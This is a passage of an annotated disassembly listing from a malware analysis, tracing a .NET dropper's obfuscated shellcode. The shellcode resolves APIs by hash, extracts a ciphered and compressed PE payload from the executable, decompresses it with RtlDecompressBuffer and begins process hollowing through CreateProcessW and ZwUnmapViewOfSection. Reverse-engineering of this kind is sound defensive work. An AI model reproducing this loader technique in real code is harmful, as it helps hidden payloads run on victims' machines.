0F3BB9845h ; 'Kernel32.dll' seg000:000003D4 E8 40 FC FF FF call getModuleHandle seg000:000003D9 68 FD 49 87 C6 push 0C68749FDh ; GetModuleHandleW seg000:000003DE 50 push eax seg000:000003DF E8 24 FD FF FF call getAPIAddress seg000:000003E4 FF D0 call eax ; ******* hModule = GetModuleHandleW ( NULL ); ******* seg000:000003E6 89 8D F0 F7 FF FF mov [ebp-810h], ecx seg000:000003EC 68 00 04 00 00 push 400h ; nSize seg000:000003F1 F7 DF neg edi seg000:000003F3 8D 8D 18 F8 FF FF lea ecx, [ebp-7E8h] seg000:000003F9 87 95 F4 F7 FF FF xchg edx, [ebp-80Ch] seg000:000003FF 51 push ecx ; lpFileName seg000:00000400 42 inc edx seg000:00000401 EB 02 jmp short loc_405 seg000:00000403 24 13 and al, 13h seg000:00000405 loc_405: ; ... seg000:00000405 50 push eax ; Module handle seg000:00000406 4B dec ebx seg000:00000407 68 45 98 BB F3 push 0F3BB9845h ; 'Kernel32.dll' seg000:0000040C E8 08 FC FF FF call getModuleHandle seg000:00000411 68 72 53 DD 91 push 91DD5372h ; ******* GetModuleFileNameW ( hModule, lpFileName=[ebp-7E8h], nSize=400 ); ******* seg000:00000416 50 push eax seg000:00000417 E8 EC FC FF FF call getAPIAddress seg000:0000041C FF D0 call eax seg000:0000041E 13 BD A4 FC FF FF adc edi, [ebp-35Ch] seg000:00000424 6A 00 push 0 ; hTemplateFile = NULL seg000:00000426 21 F1 and ecx, esi seg000:00000428 EB 02 jmp short loc_42C seg000:0000042A 60 db 60h ; ` seg000:0000042B 69 db 69h seg000:0000042C loc_42C: ; ... seg000:0000042C 68 80 00 00 00 push 80h ; 'Ç' ; dwFlagsAndAttributes = FILE_ATTRIBUTE_NORMAL seg000:00000431 46 inc esi seg000:00000432 6A 04 push 4 ; dwCreationDisposition = OPEN_ALWAYS seg000:00000434 01 5D FC add [ebp-4], ebx seg000:00000437 6A 00 push 0 ; lpSecurityAttributes = NULL; seg000:00000439 49 dec ecx seg000:0000043A EB 01 jmp short loc_43D seg000:0000043C 4C db 4Ch seg000:0000043D loc_43D: ; ... seg000:0000043D 6A 01 push 1 ; dwShareMode = FILE_SHARE_READ seg000:0000043F 31 CF xor edi, ecx seg000:00000441 68 00 00 00 80 push 80000000h ; dwDesiredAccess = GENERIC_READ seg000:00000446 F7 D8 neg eax seg000:00000448 EB 01 jmp short loc_44B seg000:0000044A F2 db 0F2h seg000:0000044B loc_44B: ; ... seg000:0000044B 8D 8D 18 F8 FF FF lea ecx, [ebp-7E8h] seg000:00000451 29 D3 sub ebx, edx seg000:00000453 51 push ecx ; lpFileName = [EBP-7E8h] seg000:00000454 83 C8 32 or eax, 32h seg000:00000457 68 45 98 BB F3 push 0F3BB9845h ; 'Kernel32.dll' seg000:0000045C E8 B8 FB FF FF call getModuleHandle seg000:00000461 68 EE 08 C0 E0 push 0E0C008EEh ; CreateFileW seg000:00000466 50 push eax seg000:00000467 E8 9C FC FF FF call getAPIAddress seg000:0000046C FF D0 call eax ; ******* CreateFileW (); ******* seg000:0000046E 23 7D 9C and edi, [ebp-64h] seg000:00000471 83 F8 FF cmp eax, 0FFFFFFFFh ; File opened ? seg000:00000474 75 0D jnz short file_opened seg000:00000476 ; --------------------------------------------- seg000:00000476 seg000:00000476 87 95 A4 FC FF FF xchg edx, [ebp-35Ch] seg000:0000047C EB 03 jmp short locret_481 seg000:0000047E C9 leave seg000:0000047F C5 3B lds edi, [ebx] seg000:00000481 locret_481: ; ... seg000:00000481 C9 leave seg000:00000482 C3 retn ; ==========> Can't open file, so can't retrieve Payload, so terminate ! seg000:00000483 seg000:00000483 seg000:00000483 seg000:00000483 file_opened: ; ... seg000:00000483 11 FB adc ebx, edi seg000:00000485 EB 02 jmp short loc_489 seg000:00000487 0C 96 or al, 96h seg000:00000489 loc_489: ; ... seg000:00000489 89 85 24 FC FF FF mov [ebp-3DCh], eax ; Storing file handle seg000:0000048F 01 CB add ebx, ecx seg000:00000491 6A 00 push 0 seg000:00000493 83 DF 34 sbb edi, 34h ; '4' seg000:00000496 EB 03 jmp short loc_49B seg000:00000498 61 db 61h ; a seg000:00000499 05 04 db 5, 4 seg000:0000049B loc_49B: ; ... seg000:0000049B FF B5 24 FC FF FF push dword ptr [ebp-3DCh] seg000:000004A1 F7 D6 not esi seg000:000004A3 68 45 98 BB F3 push 0F3BB9845h ; 'Kernel32.dll' seg000:000004A8 E8 6C FB FF FF call getModuleHandle seg000:000004AD 68 23 EE EF B2 push 0B2EFEE23h ; GetFileSize seg000:000004B2 50 push eax seg000:000004B3 E8 50 FC FF FF call getAPIAddress seg000:000004B8 FF D0 call eax ; ******* dwFileSize = GetFileSize ( hFile, NULL ); ******* seg000:000004BA 29 F9 sub ecx, edi seg000:000004BC 89 85 30 FC FF FF mov [ebp-3D0h], eax ; [ebp-3D0h] = fileSize seg000:000004C2 1B BD C0 FC FF FF sbb edi, [ebp-340h] seg000:000004C8 6A 04 push 4 seg000:000004CA 31 D7 xor edi, edx seg000:000004CC EB 01 jmp short loc_4CF seg000:000004CE C8 db 0C8h seg000:000004CF loc_4CF: ; ... seg000:000004CF 68 00 10 00 00 push 1000h seg000:000004D4 F7 D0 not eax seg000:000004D6 FF B5 30 FC FF FF push dword ptr [ebp-3D0h] seg000:000004DC 29 F3 sub ebx, esi seg000:000004DE 6A 00 push 0 seg000:000004E0 11 8D D8 F7 FF FF adc [ebp-828h], ecx seg000:000004E6 68 45 98 BB F3 push 0F3BB9845h ; 'Kernel32.dll' seg000:000004EB E8 29 FB FF FF call getModuleHandle seg000:000004F0 68 A9 A2 1A 06 push 61AA2A9h ; VirtualAlloc seg000:000004F5 50 push eax seg000:000004F6 E8 0D FC FF FF call getAPIAddress seg000:000004FB FF D0 call eax ; ******* hMemory = VirtualAlloc (); ******* seg000:000004FD 81 EB BC 00 00 00 sub ebx, 0BCh ; '+' seg000:00000503 89 85 3C FC FF FF mov [ebp-3C4h], eax ; [ebp-3C4h] = hMemory seg000:00000509 11 CE adc esi, ecx seg000:0000050B 6A 00 push 0 ; lpOverlapped = NULL seg000:0000050D 87 D9 xchg ebx, ecx seg000:0000050F EB 02 jmp short loc_513 seg000:00000511 92 db 92h ; Æ seg000:00000512 8B db 8Bh seg000:00000513 loc_513: ; ... seg000:00000513 8D 85 30 FC FF FF lea eax, [ebp-3D0h] ; fileSize seg000:00000519 43 inc ebx seg000:0000051A 50 push eax ; lpNumberOfBytesRead seg000:0000051B 42 inc edx seg000:0000051C EB 02 jmp short loc_520 seg000:0000051E 33 9E dw 9E33h seg000:00000520 loc_520: ; ... seg000:00000520 FF B5 30 FC FF FF push dword ptr [ebp-3D0h] ; nNumberOfBytesToRead seg000:00000526 11 C7 adc edi, eax seg000:00000528 FF B5 3C FC FF FF push dword ptr [ebp-3C4h] ; lpBuffer seg000:0000052E 49 dec ecx seg000:0000052F EB 01 jmp short loc_532 seg000:00000531 56 push esi seg000:00000532 loc_532: ; ... seg000:00000532 FF B5 24 FC FF FF push dword ptr [ebp-3DCh] ; hFile = file handle seg000:00000538 81 F2 DB 00 00 00 xor edx, 0DBh seg000:0000053E EB 02 jmp short loc_542 seg000:00000540 74 74 jz short loc_5B6 seg000:00000542 loc_542: ; ... seg000:00000542 68 45 98 BB F3 push 0F3BB9845h ; 'Kernel32.dll' seg000:00000547 E8 CD FA FF FF call getModuleHandle seg000:0000054C 68 9B 46 D7 C5 push 0C5D7469Bh ; ReadFile seg000:00000551 50 push eax seg000:00000552 E8 B1 FB FF FF call getAPIAddress seg000:00000557 FF D0 call eax ; ******* ReadFile (); ******* seg000:00000559 0D 8D 00 00 00 or eax, 8Dh seg000:0000055E FF B5 24 FC FF FF push dword ptr [ebp-3DCh] ; file handle seg000:00000564 21 FF and edi, edi seg000:00000566 EB 01 jmp short loc_569 seg000:00000568 6B db 6Bh seg000:00000569 loc_569: ; ... seg000:00000569 68 45 98 BB F3 push 0F3BB9845h ; 'Kernel32.dll' seg000:0000056E E8 A6 FA FF FF call getModuleHandle seg000:00000573 68 48 63 B0 BA push 0BAB06348h ; CloseHandle seg000:00000578 50 push eax seg000:00000579 E8 8A FB FF FF call getAPIAddress seg000:0000057E FF D0 call eax ; ******* CloseHandle ( hFile ); ******* seg000:00000580 42 inc edx seg000:00000581 seg000:00000581 seg000:00000581 ; ------------------------------------------------------------------ seg000:00000581 ; Build a 20 bytes buffer in memory with a deciphering routine. seg000:00000581 ; ------------------------------------------------------------------ seg000:00000581 seg000:00000581 B8 56 CD D3 A0 mov eax, 0A0D3CD56h seg000:00000586 83 65 B0 2E and dword ptr [ebp-50h], 2Eh seg000:0000058A B9 05 00 00 00 mov ecx, 5 seg000:0000058F 83 C7 64 add edi, 64h ; 'd' seg000:00000592 EB 02 jmp short loc_596 seg000:00000594 66 D1 db 66h, 0D1h seg000:00000596 loc_596: ; ... seg000:00000596 8D 7D C4 lea edi, [ebp-3Ch] ; EDI refers EBP-3C seg000:00000599 F7 D2 not edx seg000:0000059B EB 03 jmp short loc_5A0 seg000:0000059D 5B db 5Bh ; [ seg000:0000059E F6 63 dw 63F6h seg000:000005A0 ; seg000:000005A0 ; Loop will fill [EDI] seg000:000005A0 ; ECX=5 seg000:000005A0 ; EDI = [EBP-3Ch] seg000:000005A0 loc_5A0: ; ... seg000:000005A0 4A dec edx seg000:000005A1 89 C2 mov edx, eax ; EDX=0xA0D3CD56 seg000:000005A3 0F AF DA imul ebx, edx seg000:000005A6 C1 C2 07 rol edx, 7 ; ROL EDX,7 seg000:000005A9 87 DB xchg ebx, ebx seg000:000005AB 01 D0 add eax, edx ; ADD EDX,EAX seg000:000005AD F7 DE neg esi seg000:000005AF AB stosd ; EAX -> [ES:EDI] seg000:000005B0 13 55 B8 adc edx, [ebp-48h] seg000:000005B3 49 dec ecx seg000:000005B4 75 EA jnz short loc_5A0 seg000:000005B6 ; At loop end, buffer [EBP-3Ch] contains : seg000:000005B6 ; A6 78 BA 0A AB CB F6 67 5E A1 5C 63 8F 50 AD 11 17 98 55 E8 seg000:000005B6 ; It's not code ! seg000:000005B6 ; seg000:000005B6 ; will proove to be : seg000:000005B6 ; - 8 bytes signature seg000:000005B6 ; - 4 bytes XOR key for compressed size of datas seg000:000005B6 ; - 4 bytes XOR key for uncompressed size of datas seg000:000005B6 ; - 4 bytes XOR key for deciphering key to decipher datas seg000:000005B6 ; seg000:000005B6 ; datas are the PE Payload hidden in a ressource seg000:000005B6 seg000:000005B6 seg000:000005B6 seg000:000005B6 ; --------------------------------------------------------------------- seg000:000005B6 ; Now, look for the data hidden in a .net dropper executable resource seg000:000005B6 ; which is the ciphered and zipped PE Payload seg000:000005B6 ; --------------------------------------------------------------------- seg000:000005B6 seg000:000005B6 loc_5B6: ; ... seg000:000005B6 81 6D FC 9F 00 00+ sub dword ptr [ebp-4], 9Fh ; 'ƒ' seg000:000005BD 8B 8D 30 FC FF FF mov ecx, [ebp-3D0h] ; ECX = buffer size seg000:000005C3 83 AD E8 F7 FF FF+ sub dword ptr [ebp-818h], 43h ; 'C' seg000:000005CA 83 E9 04 sub ecx, 4 seg000:000005CD 83 CE 59 or esi, 59h seg000:000005D0 EB 02 jmp short loc_5D4 seg000:000005D2 27 db 27h ; ' seg000:000005D3 A1 db 0A1h seg000:000005D4 loc_5D4: ; ... seg000:000005D4 8B B5 3C FC FF FF mov esi, [ebp-3C4h] ; lpRead seg000:000005DA loc_5DA: ; ... seg000:000005DA F7 D7 not edi seg000:000005DC ; seg000:000005DC ; Loop begining seg000:000005DC ; ECX = buffer size seg000:000005DC ; ESI = buffer address seg000:000005DC ;---------------------------------------- seg000:000005DC next4bytes: ; ... seg000:000005DC 4A dec edx seg000:000005DD 8B 04 0E mov eax, [esi+ecx] seg000:000005E0 87 FB xchg edi, ebx seg000:000005E2 3B 45 C4 cmp eax, [ebp-3Ch] ; [EBP-3Ch] 20 bytes signature and deciphering structure seg000:000005E5 75 26 jnz short loc_60D seg000:000005E7 92 xchg eax, edx ; 4 bytes pattern founded ! seg000:000005E8 83 C1 04 add ecx, 4 seg000:000005EB 11 C2 adc edx, eax seg000:000005ED EB 03 jmp short loc_5F2 seg000:000005EF F5 db 0F5h ; § seg000:000005F0 E1 4A db 0E1h, 4Ah seg000:000005F2 loc_5F2: ; ... seg000:000005F2 8B 04 0E mov eax, [esi+ecx] ; EAX = contains the 4 bytes following pattern founded seg000:000005F5 31 FA xor edx, edi seg000:000005F7 83 E9 04 sub ecx, 4 ; Going back on the 4 bytes founded (last ones processed) seg000:000005FA 23 55 E4 and edx, [ebp-1Ch] seg000:000005FD EB 02 jmp short loc_601 seg000:000005FF F1 icebp seg000:00000600 FB sti seg000:00000601 loc_601: ; ... seg000:00000601 3B 45 C8 cmp eax, [ebp-38h] ; Comparing the 4 next bytes with value 0x67F6CBAB seg000:00000604 75 07 jnz short loc_60D seg000:00000606 21 F7 and edi, esi seg000:00000608 EB 15 jmp short signatureFound ; ==========> signature found ! seg000:0000060A 83 D0 40 adc eax, 40h ; '@' seg000:0000060D loc_60D: ; ... seg000:0000060D 11 F8 adc eax, edi seg000:0000060F 49 dec ecx ; Back one byte seg000:00000610 75 CA jnz short next4bytes ; Next 4 bytes please... seg000:00000612 seg000:00000612 seg000:00000612 seg000:00000612 81 EA 97 00 00 00 sub edx, 97h ; 'ù' seg000:00000618 E9 4E 06 00 00 jmp loc_C6B ; =====> ExitProcess () ! seg000:0000061D 21 CB and ebx, ecx seg000:0000061F seg000:0000061F ; --------------------------------------------------------------------- seg000:0000061F ; Signature found. Decipher the compressed buffer size, uncompress seg000:0000061F ; buffer size and deciphering key seg000:0000061F ; --------------------------------------------------------------------- seg000:0000061F seg000:0000061F signatureFound: ; ... seg000:0000061F 19 CA sbb edx, ecx seg000:00000621 EB 02 jmp short loc_625 seg000:00000623 7D B5 jge short loc_5DA seg000:00000625 loc_625: ; ... seg000:00000625 8B 45 CC mov eax, [ebp-34h] ; EAX=0x635CA15E seg000:00000628 83 C3 0F add ebx, 0Fh seg000:0000062B 83 C1 08 add ecx, 8 ; Seek after the 4 bytes found and the 4 verified seg000:0000062E 0F AF D1 imul edx, ecx seg000:00000631 33 04 0E xor eax, [esi+ecx] ; EAX = 0x635CA15E ^ 0x635C112E = 0xB070 seg000:00000634 F7 D7 not edi seg000:00000636 EB 01 jmp short loc_639 seg000:00000638 F3 db 0F3h seg000:00000639 loc_639: ; ... seg000:00000639 89 45 EC mov [ebp-14h], eax ; 0xB070 seg000:0000063C 89 CF mov edi, ecx seg000:0000063E 8B 45 D0 mov eax, [ebp-30h] ; EAX = 0x11AD508F ? seg000:00000641 0F AF DE imul ebx, esi seg000:00000644 83 C1 04 add ecx, 4 ; 4 bytes forward seg000:00000647 4F dec edi seg000:00000648 33 04 0E xor eax, [esi+ecx] ; EAX = 0x11AD508F ^ 0x11ADAA8F = 0xFA00 seg000:0000064B 47 inc edi seg000:0000064C EB 03 jmp short loc_651 seg000:0000064E DA 20 fisub dword ptr [eax] seg000:00000650 FB sti seg000:00000651 loc_651: ; ... seg000:00000651 89 45 F4 mov [ebp-0Ch], eax ; 0xFA00 seg000:00000654 F7 D2 not edx seg000:00000656 8B 45 D4 mov eax, [ebp-2Ch] ; EAX = 0xE8559817 seg000:00000659 BA E1 00 00 00 mov edx, 0E1h ; 'ß' seg000:0000065E 83 C1 04 add ecx, 4 ; 4 bytes forward seg000:00000661 F7 DF neg edi seg000:00000663 33 04 0E xor eax, [esi+ecx] ; EAX = 0xE8559817 ^ 0x48865541 = 0xA0D3CD56 seg000:00000666 F7 D7 not edi seg000:00000668 89 45 E0 mov [ebp-20h], eax ; EAX = 0xA0D3CD56 ? seg000:0000066B 0F AF DA imul ebx, edx seg000:0000066E seg000:0000066E ; --------------------------------------------------------------------- seg000:0000066E ; Ok, now decipher the compress PE payload seg000:0000066E ; --------------------------------------------------------------------- seg000:0000066E seg000:0000066E 89 F0 mov eax, esi ; EAX = buffer that contains executable readed seg000:00000670 19 F2 sbb edx, esi seg000:00000672 01 C8 add eax, ecx seg000:00000674 0F AF FF imul edi, edi seg000:00000677 83 C0 04 add eax, 4 ; EAX refers 12 octets after the 8 of signature in the buffer that contains the executable (.net dropper), offset 0xD343 of exe seg000:0000067A 4A dec edx seg000:0000067B 89 85 44 FC FF FF mov [ebp-3BCh], eax ; [EBP-3BCh] refers buffer that will be deciphered and unzipped seg000:00000681 49 dec ecx seg000:00000682 EB 02 jmp short loc_686 seg000:00000684 63 31 db 63h, 31h seg000:00000686 loc_686: ; ... seg000:00000686 FF 75 E0 push dword ptr [ebp-20h] ; 0xA0D3CD56 seg000:00000689 46 inc esi seg000:0000068A FF 75 EC push dword ptr [ebp-14h] ; 0xB070 ? Buffer size seg000:0000068D 40 inc eax seg000:0000068E FF B5 44 FC FF FF push dword ptr [ebp-3BCh] ; Readed file content seg000:00000694 4E dec esi seg000:00000695 E8 B4 FB FF FF call bufferDecipher seg000:0000069A seg000:0000069A seg000:0000069A ; --------------------------------------------------------------------- seg000:0000069A ; Then, allocate a memory block for uncompressed PE Payload and seg000:0000069A ; uncompress deciphered and still compress PE Payload in it seg000:0000069A ; --------------------------------------------------------------------- seg000:0000069A seg000:0000069A 31 CA xor edx, ecx seg000:0000069C 6A 04 push 4 seg000:0000069E 0F AF C6 imul eax, esi seg000:000006A1 EB 03 jmp short loc_6A6 seg000:000006A3 BA db 0BAh seg000:000006A4 98 db 98h ; ÿ seg000:000006A5 09 db 9 seg000:000006A6 loc_6A6: ; ... seg000:000006A6 68 00 10 00 00 push 1000h seg000:000006AB 1B 4D BC sbb ecx, [ebp-44h] seg000:000006AE FF 75 F4 push dword ptr [ebp-0Ch] ; 0xFA00 seg000:000006B1 33 85 E4 F7 FF FF xor eax, [ebp-81Ch] seg000:000006B7 EB 02 jmp short loc_6BB seg000:000006B9 1E push ds seg000:000006BA F0 lock seg000:000006BB loc_6BB: ; ... seg000:000006BB 6A 00 push 0 seg000:000006BD 93 xchg eax, ebx seg000:000006BE 68 45 98 BB F3 push 0F3BB9845h ; 'Kernel32.dll' seg000:000006C3 E8 51 F9 FF FF call getModuleHandle seg000:000006C8 68 A9 A2 1A 06 push 61AA2A9h ; VirtualAlloc seg000:000006CD 50 push eax seg000:000006CE E8 35 FA FF FF call getAPIAddress seg000:000006D3 FF D0 call eax ; ******* VirtualAlloc (); ******* seg000:000006D5 49 dec ecx seg000:000006D6 89 85 4C FC FF FF mov [ebp-3B4h], eax ; buffer address to store unzipped datas seg000:000006DC 0F AF F6 imul esi, esi seg000:000006DF EB 03 jmp short loc_6E4 seg000:000006E1 5C pop esp seg000:000006E2 B6 6A mov dh, 6Ah ; 'j' seg000:000006E4 loc_6E4: ; ... seg000:000006E4 8D 85 58 FC FF FF lea eax, [ebp-3A8h] seg000:000006EA 19 F1 sbb ecx, esi seg000:000006EC 50 push eax ; FinalUncompressedSize seg000:000006ED 33 9D 00 F8 FF FF xor ebx, [ebp-800h] seg000:000006F3 EB 01 jmp short loc_6F6 seg000:000006F5 AD lodsd seg000:000006F6 loc_6F6: ; ... seg000:000006F6 FF 75 EC push dword ptr [ebp-14h] ; CompressedBufferSize seg000:000006F9 42 inc edx seg000:000006FA EB 01 jmp short loc_6FD seg000:000006FC 0E push cs seg000:000006FD loc_6FD: ; ... seg000:000006FD FF B5 44 FC FF FF push dword ptr [ebp-3BCh] ; CompressedBuffer seg000:00000703 13 5D BC adc ebx, [ebp-44h] seg000:00000706 FF 75 F4 push dword ptr [ebp-0Ch] ; UnCompressedBufferSize seg000:00000709 C7 85 F0 F7 FF FF+ mov dword ptr [ebp-810h], 82h ; 'é' seg000:00000713 FF B5 4C FC FF FF push dword ptr [ebp-3B4h] ; UnCompressedBuffer = [EBP-3B4h] seg000:00000719 6B FF 26 imul edi, 26h seg000:0000071C 6A 02 push 2 ; COMPRESSION_FORMAT_LZNT1 seg000:0000071E 87 BD 28 FC FF FF xchg edi, [ebp-3D8h] seg000:00000724 68 A2 03 1E EA push 0EA1E03A2h ; 'Ntdll.dll' seg000:00000729 E8 EB F8 FF FF call getModuleHandle seg000:0000072E 68 0D 4B 74 54 push 54744B0Dh ; RtlDecompressBuffer seg000:00000733 50 push eax seg000:00000734 E8 CF F9 FF FF call getAPIAddress seg000:00000739 FF D0 call eax ; ******* RtlDecompressBuffer(); ******* seg000:0000073B 09 C3 or ebx, eax seg000:0000073D 3D 00 00 00 80 cmp eax, 80000000h seg000:00000742 72 42 jb short loc_786 seg000:00000744 seg000:00000744 ; --------------------------------------------------------------------- seg000:00000744 ; If there is a problem, terminate ! seg000:00000744 ; --------------------------------------------------------------------- seg000:00000744 seg000:00000744 31 8D A8 FC FF FF xor [ebp-358h], ecx seg000:0000074A EB 03 jmp short loc_74F seg000:0000074C 2E 19 5C db 2Eh, 19h, 5Ch seg000:0000074F loc_74F: ; ... seg000:0000074F 3D 42 02 00 C0 cmp eax, 0C0000242h seg000:00000754 74 30 jz short loc_786 seg000:00000756 69 F6 C0 00 00 00 imul esi, 0C0h seg000:0000075C 6A 00 push 0 seg000:0000075E 81 F3 E9 00 00 00 xor ebx, 0E9h seg000:00000764 68 45 98 BB F3 push 0F3BB9845h ; 'Kernel32.dll' seg000:00000769 E8 AB F8 FF FF call getModuleHandle seg000:0000076E 68 83 62 4C CE push 0CE4C6283h ; ExitProcess seg000:00000773 50 push eax seg000:00000774 E8 8F F9 FF FF call getAPIAddress seg000:00000779 FF D0 call eax ; ==========> This is the end ! seg000:0000077B 81 CF C5 00 00 00 or edi, 0C5h seg000:00000781 EB 03 jmp short loc_786 seg000:00000783 DC 7F 68 fdivr qword ptr [edi+68h] seg000:00000786 seg000:00000786 ; --------------------------------------------------------------------- seg000:00000786 ; PE Payload ready in memory ! seg000:00000786 ; Create a process, fill it and launch it seg000:00000786 ; --------------------------------------------------------------------- seg000:00000786 seg000:00000786 loc_786: ; ... seg000:00000786 29 F0 sub eax, esi seg000:00000788 68 00 40 00 00 push 4000h seg000:0000078D 89 D8 mov eax, ebx seg000:0000078F FF B5 30 FC FF FF push dword ptr [ebp-3D0h] seg000:00000795 29 D9 sub ecx, ebx seg000:00000797 FF B5 3C FC FF FF push dword ptr [ebp-3C4h] seg000:0000079D F7 D2 not edx seg000:0000079F 68 45 98 BB F3 push 0F3BB9845h ; 'Kernel32.dll' seg000:000007A4 E8 70 F8 FF FF call getModuleHandle seg000:000007A9 68 54 87 30 A8 push 0A8308754h ; VirtualFree seg000:000007AE 50 push eax seg000:000007AF E8 54 F9 FF FF call getAPIAddress seg000:000007B4 FF D0 call eax seg000:000007B6 13 85 00 F8 FF FF adc eax, [ebp-800h] seg000:000007BC EB 02 jmp short loc_7C0 seg000:000007BE 26 9B dw 9B26h seg000:000007C0 loc_7C0: ; ... seg000:000007C0 6A 10 push 10h ; Length seg000:000007C2 83 D7 48 adc edi, 48h ; 'H' seg000:000007C5 8D 85 B0 FC FF FF lea eax, [ebp-350h] seg000:000007CB 83 E2 1F and edx, 1Fh seg000:000007CE 50 push eax ; *Destination seg000:000007CF BB E8 00 00 00 mov ebx, 0E8h ; 'Þ' seg000:000007D4 EB 03 jmp short loc_7D9 seg000:000007D6 88 68 10 mov [eax+10h], ch seg000:000007D9 loc_7D9: ; ... seg000:000007D9 68 A2 03 1E EA push 0EA1E03A2h ; 'Ntdll.dll' seg000:000007DE E8 36 F8 FF FF call getModuleHandle seg000:000007E3 68 FE 6A 48 55 push 55486AFEh ; RtlZeroMemory seg000:000007E8 50 push eax seg000:000007E9 E8 1A F9 FF FF call getAPIAddress seg000:000007EE FF D0 call eax seg000:000007F0 89 FB mov ebx, edi seg000:000007F2 6A 44 push 44h ; 'D' seg000:000007F4 F7 D3 not ebx seg000:000007F6 8D 85 60 FC FF FF lea eax, [ebp-3A0h] seg000:000007FC 42 inc edx seg000:000007FD 50 push eax seg000:000007FE 69 D2 E3 00 00 00 imul edx, 0E3h seg000:00000804 EB 02 jmp short loc_808 seg000:00000806 FC db 0FCh ; ³ seg000:00000807 13 db 13h seg000:00000808 loc_808: ; ... seg000:00000808 68 A2 03 1E EA push 0EA1E03A2h ; 'Ntdll.dll' seg000:0000080D E8 07 F8 FF FF call getModuleHandle seg000:00000812 68 FE 6A 48 55 push 55486AFEh ; RtlZeroMemory seg000:00000817 50 push eax seg000:00000818 E8 EB F8 FF FF call getAPIAddress seg000:0000081D FF D0 call eax seg000:0000081F seg000:0000081F ; Interesting point : propagating command line args to the payload ! seg000:0000081F B9 35 00 00 00 mov ecx, 35h ; '5' seg000:00000824 EB 01 jmp short loc_827 seg000:00000826 03 db 3 seg000:00000827 loc_827: ; ... seg000:00000827 68 45 98 BB F3 push 0F3BB9845h ; 'Kernel32.dll' seg000:0000082C E8 E8 F7 FF FF call getModuleHandle seg000:00000831 68 7C 00 E5 71 push 71E5007Ch ; GetCommandLineW seg000:00000836 50 push eax seg000:00000837 E8 CC F8 FF FF call getAPIAddress seg000:0000083C FF D0 call eax ; ******* GetCommandeLineW (); ******* seg000:0000083E 0F AF F1 imul esi, ecx seg000:00000841 89 C1 mov ecx, eax seg000:00000843 21 FB and ebx, edi seg000:00000845 EB 02 jmp short loc_849 seg000:00000847 D0 F6 sal dh, 1 seg000:00000849 loc_849: ; ... seg000:00000849 C7 85 60 FC FF FF+ mov dword ptr [ebp-3A0h], 44h ; 'D' seg000:00000853 19 CA sbb edx, ecx seg000:00000855 8D 85 B0 FC FF FF lea eax, [ebp-350h] seg000:0000085B F7 DF neg edi seg000:0000085D 50 push eax ; lpProcessInformation seg000:0000085E 0F AF DE imul ebx, esi seg000:00000861 8D 85 60 FC FF FF lea eax, [ebp-3A0h] seg000:00000867 81 DA F4 00 00 00 sbb edx, 0F4h ; '¶' seg000:0000086D 50 push eax ; lpStartupInfo seg000:0000086E 23 95 14 F8 FF FF and edx, [ebp-7ECh] seg000:00000874 6A 00 push 0 ; lpCurrentDirectory seg000:00000876 29 F8 sub eax, edi seg000:00000878 6A 00 push 0 ; lpEnvironment seg000:0000087A 0F AF F0 imul esi, eax seg000:0000087D 6A 04 push 4 ; dwCreationFlags = CREATE_SUSPENDED seg000:0000087F 89 DF mov edi, ebx seg000:00000881 6A 00 push 0 ; bInheritHandles seg000:00000883 2B B5 F8 F7 FF FF sub esi, [ebp-808h] seg000:00000889 6A 00 push 0 ; lpThreadAttributes seg000:0000088B 81 EF FB 00 00 00 sub edi, 0FBh ; '¹' seg000:00000891 EB 03 jmp short loc_896 seg000:00000893 8F C1 pop ecx seg000:00000895 F1 icebp seg000:00000896 loc_896: ; ... seg000:00000896 6A 00 push 0 ; lpProcessAttributes seg000:00000898 19 F3 sbb ebx, esi seg000:0000089A EB 03 jmp short loc_89F seg000:0000089C E7 38 AB db 0E7h, 38h, 0ABh seg000:0000089F loc_89F: ; ... seg000:0000089F 51 push ecx ; lpCommandLine seg000:000008A0 31 85 28 FC FF FF xor [ebp-3D8h], eax seg000:000008A6 6A 00 push 0 ; lpApplicationName seg000:000008A8 09 85 48 FC FF FF or [ebp-3B8h], eax seg000:000008AE 68 45 98 BB F3 push 0F3BB9845h ; 'Kernel32.dll' seg000:000008B3 E8 61 F7 FF FF call getModuleHandle seg000:000008B8 68 3F 00 73 19 push 1973003Fh ; CreateProcessW seg000:000008BD 50 push eax seg000:000008BE E8 45 F8 FF FF call getAPIAddress seg000:000008C3 FF D0 call eax ; ******* CreateProcessW () ******* seg000:000008C5 13 7D B0 adc edi, [ebp-50h] seg000:000008C8 8B 85 4C FC FF FF mov eax, [ebp-3B4h] ; PE payload deciphered and unzipped seg000:000008CE 87 95 F8 F7 FF FF xchg edx, [ebp-808h] seg000:000008D4 EB 01 jmp short loc_8D7 seg000:000008D6 99 cdq seg000:000008D7 loc_8D7: ; ... seg000:000008D7 03 40 3C add eax, [eax+3Ch] ; EAX -> PE Header seg000:000008DA 4A dec edx seg000:000008DB 89 45 B4 mov [ebp-4Ch], eax seg000:000008DE F7 D1 not ecx seg000:000008E0 8B db 8Bh ; ï seg000:000008E1 40 inc eax seg000:000008E2 34 C7 xor al, 0C7h seg000:000008E4 45 inc ebp seg000:000008E5 AC lodsb seg000:000008E6 01 00 add [eax], eax seg000:000008E8 00 db 0 ; add byte ptr ds:[eax],al seg000:000008E9 00 db 0 seg000:000008EA 89 45 A4 mov [ebp-5Ch], eax seg000:000008ED 87 FB xchg edi, ebx seg000:000008EF FF 75 A4 push dword ptr [ebp-5Ch] ; BaseAddress seg000:000008F2 F7 D1 not ecx seg000:000008F4 FF B5 B0 FC FF FF push dword ptr [ebp-350h] ; ProcessHandle seg000:000008FA 89 F0 mov eax, esi seg000:000008FC 68 A2 03 1E EA push 0EA1E03A2h ; 'Ntdll.dll' seg000:00000901 E8 13 F7 FF FF call getModuleHandle seg000:00000906 68 6C 23 51 5D push 5D51236Ch ; ZwUnmapViewOfSection seg000:0000090B 50 push eax seg000:0000090C E8 F7 F7 FF FF call getAPIAddress seg000:00000911 FF D0 call eax ; ******* ZwUnmapViewOfSection () ******* seg000:00000913 29 C7 sub edi, eax seg000:00000915 EB 02 jmp short loc_919 seg000:00000917 63 db 63h ; c seg000:00000918 D9 db 0D9h ; + seg000:00000919 loc_919: ; ... seg000:00000919 6A 40 push 40h ; '@' seg000:0000091B F7 D1 not ecx seg000:0000091D EB 03 jmp short loc_922 seg000:0000091F 4B db 4Bh ; K seg000:00000920 E7 db 0E7h ; þ seg000:00000921 3D db 3Dh ; = seg000:00000922 loc_922: ; ... seg000:00000922 68 00 30 00 00 push 3000h seg000:00000927 C7 85 DC F7 FF FF+ mov dword ptr [ebp-824h], 0BEh ; '¥' seg000:00000931 EB 01 jmp short loc_934 seg000:00000933 2C db 2Ch ; , seg000:00000934 